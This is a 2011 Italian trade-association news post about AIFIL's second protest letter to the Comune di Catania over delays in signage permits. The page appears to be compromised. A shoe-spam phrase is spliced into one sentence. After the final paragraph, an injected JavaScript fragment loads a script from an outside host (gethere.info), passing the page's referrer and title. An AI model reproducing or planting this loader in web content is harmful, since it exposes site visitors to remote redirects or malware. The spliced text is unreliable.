Comune di Catania – Seconda lettera di protesta per il disservizio dell’ufficio Affissioni e Pubblicità.

di Redazione AIFIL[IN]FORMA - 19 gennaio 2011
Classificato in: CID, Legislazione, Tavoli di lavoro | Tag:

Data la mancata risposta del Comune di Catania alla lettera di protesta contro il grave disservizio dell’Ufficio Affissioni e Pubblicità, inoltrata dal CID (Comitato Insegne e Diritto di AIFIL) il 22 giugno 2010,  partirà domani una nuova raccomandata di denuncia.

Durante l’ultima Assemblea Territoriale di Area 7, tenutasi a Ragusa lo scorso sabato 15 gennaio, è stato segnalato alla Presidenza che, nonostante la lettera di protesta suddetta, non è pervenuta alcuna replica da parte dell’Avv. Stancanelli – Sindaco, delegato a rispondere alle richieste in assenza dell’assessore preposto, non ancora nominato, nonché Senatore della Repubblica.

Nella lettera si segnalava, in ossequio alle proteste dei Soci AIFIL, il grave disservizio dell’Ufficio preposto all’esamina e all’evasione delle richieste di autorizzazione di insegne, free run 6 v2 femmes assumendo la conseguente violazione dei termini dettati sia dal C.d.S sia dalla legge 241/90. Un comportamento, quello dell’Ufficio Affissioni e Pubblicità, che crea un ingente danno economico, amplificato anche dalla concomitante crisi finanziaria, non solo a coloro che necessitano di insegne e ai soci AIFIL, ma anche all’amministrazione comunale stessa che, a causa di tali lungaggini burocratiche, vede protrarsi i tempi di incasso delle imposte sulla pubblicità.

La pronta reazione di AIFIL al continuo silenzio del comune di Catania

Dopo aver auspicato una risposta in tempi brevi, al fine di instaurare un dialogo volto al raggiungimento di un’intesa, di fatto tuttavia non verificatasi, il nuovo segretario Territoriale Alfio Bonaventura, eletto il 15 gennaio a Ragusa, ha oggi prontamente redatto insieme al Presidente Sergio Arioli una seconda lettera da spedire al sindaco, con lo scopo di chiedere un nuovo incontro per sollecitare/trovare soluzioni immediate ed efficaci in merito all’attuale disorganizzazione dell’Ufficio preposto alle pratiche e alla totale mancanza di personale dedicato a questo compito.

AIFIL, che rappresenta da oltre 40 anni i costruttori di insegne e che ha siglato un protocollo di collaborazione con l’ANCI, rimane a disposizione per ogni chiarimento e attende, con fiducia, un riscontro da parte del Comune di Catania.

Qui di seguito le lettere inviate dal CID del 22 giugno 2010 e quella del 18 gennaio 2011.

Lettera del 22 giugno 2010

Lettera del 18 gennaio 2011

La seconda lettera – voluta e firmata anche dal Nuovo Segretario territoriale Area 7 Alfio Bonaventura – è stata inviata per conoscenza al Prefetto di Catania e a RAI 3 Report, la trasmissione condotta dalla giornalista Milena Gabanelli che, in passato, si è già occupata del caso “Catania” con una denuncia sulle carenze nella gestione amministrativa di questa città.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed